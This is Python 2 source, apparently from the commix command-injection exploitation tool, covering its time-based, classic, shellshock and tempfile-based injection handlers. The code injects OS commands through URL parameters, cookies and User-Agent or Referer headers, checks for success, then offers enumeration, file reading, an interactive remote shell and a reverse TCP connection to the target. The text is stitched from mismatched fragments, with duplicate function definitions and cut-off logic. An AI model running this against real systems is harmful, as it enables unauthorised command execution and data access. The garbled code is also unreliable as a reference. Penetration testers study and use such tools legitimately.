percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total * 1.0)),2))
if percent == 100 and no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = ""
else:
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
# Time relative false positive fixation.
if len(TAG) == output_length:
randv1 = random.randrange(0, 1)
randv2 = random.randrange(1, 2)
randvcalc = randv1 + randv2
cmd = "(" + str(randv1) + "+" + str(randv2) + ")"
# Check for false positive resutls
output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell)
if str(output) == str(randvcalc) and len(TAG) == output_length:
if not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = ""
else:
break
else:
percent = str(float_percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
if len(TAG) == output_length :
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
if settings.ENUMERATION_DONE == True :
while True:
enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower()
if enumerate_again in settings.CHOISE_YES:
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
break
elif enumerate_again in settings.CHOISE_NO:
break
elif enumerate_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
# Check for any system file access options.
if settings.FILE_ACCESS_DONE == True :
while True:
file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
if file_access_again in settings.CHOISE_YES:
print ""
tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
break
elif file_access_again in settings.CHOISE_NO:
break
elif file_access_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
# Check if defined single cmd.
if menu.options.os_cmd:
cmd = menu.options.os_cmd
check_how_long, output = tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
# Exploirt injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
sys.exit(0)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
continue
elif cmd.lower() == "quit":
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.check_next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
else:
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell, filename)
# Exploirt injection result
tb_injector.export_injection_results(cmd, separator, output, check_how_long)
print ""
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if checks.check_next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique):
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
while True:
try:
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
print Fore.YELLOW + "(^) Warning: You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif cmd.lower() == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
if menu.options.verbose:
print ""
print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
def cb_injection_handler(url, delay, filename, http_request_method):
counter = 1
vp_flag = True
no_result = True
is_encoded= False
export_injection_info = False
injection_type = "Results-based Command Injection"
technique = "classic injection technique"
sys.stdout.write("(*) Testing the "+ technique + "... ")
sys.stdout.flush()
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
for whitespace in settings.WHITESPACES:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
i = i + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
# Define alter shell
alter_shell = menu.options.alter_shell
try:
if alter_shell:
# Classic -alter shell- decision payload (check if host is vulnerable).
payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
else:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.decision(separator, TAG, randv1, randv2)
# Define prefixes & suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
if menu.options.base64:
payload = urllib.unquote(payload)
payload = base64.b64encode(payload)
else:
if separator == " " :
payload = re.sub(" ", "%20", payload)
else:
payload = re.sub(" ", whitespace, payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
response = cb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url)
# Evaluate test results.
shell = cb_injector.injection_test_results(response, TAG, randvcalc)
if not menu.options.verbose:
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(float_percent)+"%"
elif len(shell) != 0:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
continue
# Yaw, got shellz!
# Do some magic tricks!
if shell:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
# Check for any enumeration options.
cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# Check for any system file access options.
cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# Check if defined single cmd.
if menu.options.os_cmd:
cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# Command execution results.
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell)
html_parser = HTMLParser.HTMLParser()
shell = html_parser.unescape(shell)
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
if menu.options.verbose:
print ""
if go_back == True:
break
gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
cmd = raw_input("Shell > ")
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
# Delete previous shell (text) files (output)
delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.next_attack_vector(technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
def input_cmd(http_request_method, url, vuln_parameter, ip_src, technique):
# Pseudo-Terminal shell
go_back = False
go_back_again = False
while True:
if go_back == True:
break
gotshell = raw_input(
"\n(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
if readline_error:
checks.no_readline_module()
while True:
try:
# Tab compliter
if not readline_error:
readline.set_completer(menu.tab_completer)
# MacOSX tab compliter
if getattr(readline, '__doc__',
'') is not None and 'libedit' in getattr(
readline, '__doc__', ''):
readline.parse_and_bind("bind ^I rl_complete")
# Unix tab compliter
else:
readline.parse_and_bind("tab: complete")
cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED +
"""os_shell""" + Style.RESET_ALL +
""") > """)
cmd = checks.escaped_cmd(cmd)
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "quit" or cmd.lower() == "back":
print ""
os._exit(0)
elif cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "os_shell":
print Fore.YELLOW + settings.WARNING_SIGN + "You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
elif cmd.lower() == "reverse_tcp":
# Set up LHOST / LPORT for The reverse TCP connection.
lhost, lport = reverse_tcp.configure_reverse_tcp()
while True:
if lhost and lport in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(
lhost)
else:
cmd = reverse_tcp.reverse_tcp_options(
lhost, lport)
result = checks.check_reverse_tcp_options(
cmd)
if result != None:
if result == 0:
return False
elif result == 1 or result == 2:
go_back_again = True
break
# Command execution results.
cmd_exec(http_request_method, cmd, url,
vuln_parameter, ip_src)
if menu.options.verbose:
print ""
print Back.RED + settings.ERROR_SIGN + "The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
else:
# Command execution results.
cmd_exec(http_request_method, cmd, url, vuln_parameter,
ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_NO:
print ""
os._exit(0)
elif gotshell in settings.CHOISE_QUIT:
print ""
os._exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + settings.ERROR_SIGN + "'" + gotshell + "' is not a valid answer." + Style.RESET_ALL + "\n"
pass
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
sys.stdout.write("(*) Testing the " + technique + "... ")
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
payload + Style.RESET_ALL)
header = {check_header: payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i * 100) / total)
float_percent = "{0:.1f}".format(
round(((i * 100) / (total * 1.0)), 2))
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent) + "%"
sys.stdout.write("\r(*) Testing the " + technique +
"... " + "[ " + percent + " ]")
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(
export_injection_info, filename, injection_type,
technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename,
check_header,
vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
if cve in response.info():
no_result = False
print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title(
) + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title(
) + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
# Enumeration options.
if settings.ENUMERATION_DONE == True:
print ""
while True:
enumerate_again = raw_input(
"(?) Do you want to enumerate again? [Y/n/q] > "
).lower()
if enumerate_again in settings.CHOISE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOISE_NO:
break
elif enumerate_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True:
while True:
file_access_again = raw_input(
"(?) Do you want to access files again? [Y/n/q] > "
).lower()
if file_access_again in settings.CHOISE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOISE_NO:
break
elif file_access_again in settings.CHOISE_QUIT:
sys.exit(0)
else:
if file_access_again == "":
file_access_again = "enter"
print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL
pass
else:
file_access(url, cve, check_header, filename)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header, filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL
sys.exit(0)
else:
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False:
print ""
gotshell = raw_input(
"(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > "
).lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower(
) in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
if checks.check_next_attack_vector(
technique,
go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
else:
pass
else:
shell = cmd_exec(
url, cmd, cve, check_header,
filename)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if checks.check_next_attack_vector(
technique, go_back) == True:
break
else:
if no_result == True:
return False
else:
return True
elif gotshell in settings.CHOISE_QUIT:
sys.exit(0)
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
continue
break
else:
continue
except urllib2.HTTPError, err:
print "\n" + Fore.YELLOW + "(^) Warning: " + str(err) + Style.RESET_ALL
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
if separator == ";" or separator == "&&" or separator == "||":
print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
# Injection percentage calculation
percent = ((num_of_chars * 100) / total)
if percent == 100 and no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = ""
else:
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
# Time relative false positive fixation.
randv1 = random.randrange(0, 1)
randv2 = random.randrange(1, 2)
randvcalc = randv1 + randv2
cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
if str(output) == str(randvcalc):
if not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = ""
else:
break
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
percent = ((num_of_chars * 100) / total)
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay) :
if len(TAG) == output_length:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check for any enumeration options.
tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check if defined single cmd.
if menu.options.os_cmd:
tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
continue
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
break
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
